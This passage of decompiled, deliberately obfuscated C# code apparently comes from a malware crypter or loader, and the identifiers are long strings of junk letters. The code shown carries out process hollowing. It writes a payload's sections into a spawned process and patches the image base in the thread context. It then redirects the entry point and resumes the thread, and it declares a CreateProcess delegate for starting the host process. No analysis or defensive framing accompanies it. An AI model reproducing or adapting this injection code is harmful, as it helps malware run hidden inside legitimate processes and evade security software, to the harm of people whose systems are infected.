numArray[index] = JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUvz[checked ((int) ((long) hkujkrwesffdssfoueowdUmm1.Pointer + (long) index))];
|
|
||||||
checked { ++index; }
|
|
||||||
}
|
|
||||||
rp.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUha hkujkrwesffdssfoueowdUha3 = hkujkrwesffdssfoueowdUha1;
|
|
||||||
IntPtr process4 = info.Process;
|
|
||||||
IntPtr address4 = (IntPtr) (long) checked (num6 + hkujkrwesffdssfoueowdUmm1.Address);
|
|
||||||
byte[] buffer2 = numArray;
|
|
||||||
IntPtr size2 = (IntPtr) (long) hkujkrwesffdssfoueowdUmm1.Size;
|
|
||||||
num8 = checked ((int) num10);
|
|
||||||
ref int local4 = ref num8;
|
|
||||||
int num15 = hkujkrwesffdssfoueowdUha3(process4, address4, buffer2, size2, out local4) ? 1 : 0;
|
|
||||||
num10 = checked ((uint) num8);
|
|
||||||
checked { ++num13; }
|
|
||||||
}
|
|
||||||
object bytes = (object) BitConverter.GetBytes(num6);
|
|
||||||
rp.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUha hkujkrwesffdssfoueowdUha4 = hkujkrwesffdssfoueowdUha1;
|
|
||||||
IntPtr process5 = info.Process;
|
|
||||||
IntPtr address5 = (IntPtr) checked ((long) context.Ebx + 8L);
|
|
||||||
byte[] buffer3 = (byte[]) bytes;
|
|
||||||
IntPtr size3 = (IntPtr) 4;
|
|
||||||
num8 = checked ((int) num10);
|
|
||||||
ref int local5 = ref num8;
|
|
||||||
int num16 = hkujkrwesffdssfoueowdUha4(process5, address5, buffer3, size3, out local5) ? 1 : 0;
|
|
||||||
num7 = checked ((uint) num8);
|
|
||||||
context.Eax = checked (num6 + hkujkrwesffdssfoueowdUzad3.Optional.Address);
|
|
||||||
int num17 = hkujkrwesffdssfoueowdU5(info.Thread, ref context) ? 1 : 0;
|
|
||||||
int num18 = (int) hkujkrwesffdssfoueowdU1(info.Thread);
|
|
||||||
}
|
|
||||||
|
|
||||||
private static long JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUrk(
|
|
||||||
long JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUil,
|
|
||||||
long JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUnm)
|
|
||||||
{
|
|
||||||
return checked ((long) Math.Round(unchecked (rp.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUbv(JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUil) / Math.Pow(2.0, (double) JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUnm))));
|
|
||||||
}
|
|
||||||
|
|
||||||
private static double JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUbv(
|
|
||||||
long JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUb)
|
|
||||||
{
|
|
||||||
return JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUb >= 0L ? (double) JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUb : (double) JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUb + 4294967296.0;
|
|
||||||
}
|
|
||||||
|
|
||||||
private static long JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUcc(
|
|
||||||
long JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUch)
|
|
||||||
{
|
|
||||||
return Conversions.ToLong(new object[8]
|
|
||||||
{
|
|
||||||
(object) 1L,
|
|
||||||
(object) 16L,
|
|
||||||
(object) 2U,
|
|
||||||
(object) 32L,
|
|
||||||
(object) 4L,
|
|
||||||
(object) 64L,
|
|
||||||
(object) 4L,
|
|
||||||
(object) 64L
|
|
||||||
}[checked ((int) rp.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUrk(JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUch, 29L))]);
|
|
||||||
}
|
|
||||||
|
|
||||||
public delegate bool JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUsadf(
|
|
||||||
string name,
|
|
||||||
string command,
|
|
||||||
ref rp.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUm.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUmmmmm process,
|
|
||||||
ref rp.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUm.JSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUJSFFUADKSSKFKKKOJDISADUEEJJDDSSUHHJROOFERAJWDkOUKJKLIJJUKDOAOHHDFOOJIHLEFSQKlSKlJHDKDEOLOFDLDRkIKDJDOIILLFIKUOSWFEIHIKDILDAADIQJSESEJKFFWUEFADQFFEFLIUJRFEWJFSKFKLDkRWUHSKEDWJSIDElHKUJKRWESFFDSSFOUEOWDUmmmmm thread,
|
|
||||||
bool inherit,
|
|
||||||
uint flags,
|
|
||||||
IntPtr system,
|
|
||||||
string current,
|
|
||||||
